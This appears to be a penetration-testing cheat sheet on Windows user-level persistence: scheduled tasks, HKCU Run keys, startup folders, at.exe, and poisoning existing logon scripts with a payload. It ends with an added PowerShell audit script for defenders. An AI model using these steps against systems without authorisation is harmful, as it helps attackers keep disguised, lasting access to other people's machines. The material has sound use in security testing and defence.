Table Of Contents

  • User Level Persistence
    • Scheduled Task User Persistence
    • Run Key User Persistence
    • Startup Directories
    • at.exe Schedule (WinXP)
    • Poisoning Existing Scripts

User Level Persistence

  • Note: This section details important and useful user-level persistence techniques. Because they are “user level”, they require no administrative privileges, and most of them execute at user logon.

Scheduled Task User Persistence

  • Note: Upload a binary and add a scheduled task pointing at it. OfficeUpdater can be changed to a task name that blends into the target system.

Add a user-level task that executes daily at 9:00 AM

schtasks /Create /F /SC DAILY /ST 09:00 /TN OfficeUpdater /TR <FILE_PATH>

Query task in verbose mode

schtasks /query /tn OfficeUpdater /fo list /v

Delete task

schtasks /delete /tn OfficeUpdater /f

Run Key User Persistence

  • Note: Upload a binary and add a Run key value pointing at it. OfficeUpdater can be changed to a value name that blends into the target system.

Add key

reg ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V OfficeUpdater /t REG_SZ /F /D "<FILE_PATH>"

Query key

reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Delete key

reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V OfficeUpdater

Startup Directories

  • Note: Upload a binary to one of the "startup" folders below. Every file in such a folder is executed at user logon.

Windows NT 6.1, 6.0, Windows 10, Windows 11

:: All users:
%SystemDrive%\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
:: Specific users:
%SystemDrive%\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Windows NT 5.2, 5.1, 5.0

%SystemDrive%\Documents and Settings\All Users\Start Menu\Programs\Startup

Windows 9x

%SystemDrive%\WINDOWS\Start Menu\Programs\Startup

Windows NT 4.0, 3.51, 3.50

%SystemDrive%\WINNT\Profiles\All Users\Start Menu\Programs\Startup

at.exe Schedule (WinXP)

Schedule task

at HH:MM <FILE_PATH> [ARGS]

Delete task

at <TASK_ID> /delete

Poisoning Existing Scripts

  • Enumerate all user persistence locations discussed in this section, looking for existing persistence that was created via script files such as .bat, .ps1, etc.
  • If those scripts are modifiable by a basic user, modify them to launch a malicious uploaded payload. Beware: if the script lives on a file server, it could be executed by many users.
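As an added defender-side example (not from the original page), the following PowerShell audits the three user-level locations covered above for the current account and flags script-based entries (.bat, .ps1, etc.) that the current user can modify, which is exactly the exposure the poisoning technique relies on. It assumes Windows PowerShell 5.1 or later with the ScheduledTasks module (Windows 8 / Server 2012 and newer); the function names are my own.

```powershell
# Added example, not from the original page: audit user-level persistence
# locations and flag script targets writable by the current user.
function Get-CommandTarget {
    # Return the executable/script path at the start of a command line, honouring
    # double quotes (e.g. "C:\Program Files\x\update.bat" /silent).
    param([string]$CommandLine)
    if ($CommandLine -match '^\s*"([^"]+)"' -or $CommandLine -match '^\s*(\S+)') {
        return [Environment]::ExpandEnvironmentVariables($Matches[1])
    }
    return $null
}

function Test-UserWritable {
    # Probe write access by opening the file read/write; nothing is written.
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path -PathType Leaf)) { return $false }
    try { $fs = [IO.File]::Open($Path, 'Open', 'ReadWrite', 'ReadWrite'); $fs.Close(); return $true }
    catch { return $false }
}

function Get-UserPersistenceAudit {
    $scriptExt = '.bat', '.cmd', '.ps1', '.vbs', '.js', '.wsf'
    $entries = @()
    # 1. HKCU Run key values (the location used in the Run Key section)
    $runKey = 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    if (Test-Path $runKey) {
        (Get-ItemProperty $runKey).PSObject.Properties |
            Where-Object { $_.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$' } |
            ForEach-Object { $entries += [pscustomobject]@{ Source = 'RunKey'; Name = $_.Name; Command = $_.Value } }
    }
    # 2. Per-user Startup folder: every file here runs at logon
    $startup = [Environment]::GetFolderPath('Startup')
    Get-ChildItem -LiteralPath $startup -File -ErrorAction SilentlyContinue |
        ForEach-Object { $entries += [pscustomobject]@{ Source = 'StartupFolder'; Name = $_.Name; Command = "`"$($_.FullName)`"" } }
    # 3. Scheduled tasks whose principal is the current user (readable without admin)
    $user = [Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[-1]
    Get-ScheduledTask -ErrorAction SilentlyContinue |
        Where-Object { $_.Principal.UserId -and $_.Principal.UserId.Split('\')[-1] -ieq $user } |
        ForEach-Object { foreach ($a in $_.Actions) { if ($a.Execute) {
            $entries += [pscustomobject]@{ Source = 'ScheduledTask'; Name = $_.TaskName; Command = "$($a.Execute) $($a.Arguments)".Trim() } } } }
    # Flag script-based entries the current user could alter (the poisoning risk)
    foreach ($e in $entries) {
        $target = Get-CommandTarget $e.Command
        $isScript = $target -and ($scriptExt -contains [IO.Path]::GetExtension($target).ToLower())
        $e | Add-Member -NotePropertyName Target -NotePropertyValue $target
        $e | Add-Member -NotePropertyName ScriptWritableByUser -NotePropertyValue ($isScript -and (Test-UserWritable $target))
    }
    return $entries
}

Get-UserPersistenceAudit | Format-Table Source, Name, Target, ScriptWritableByUser -AutoSize
```

Any row with ScriptWritableByUser set to True is a script that a standard user can rewrite; tightening its ACL (or moving it to an admin-owned location) closes that path.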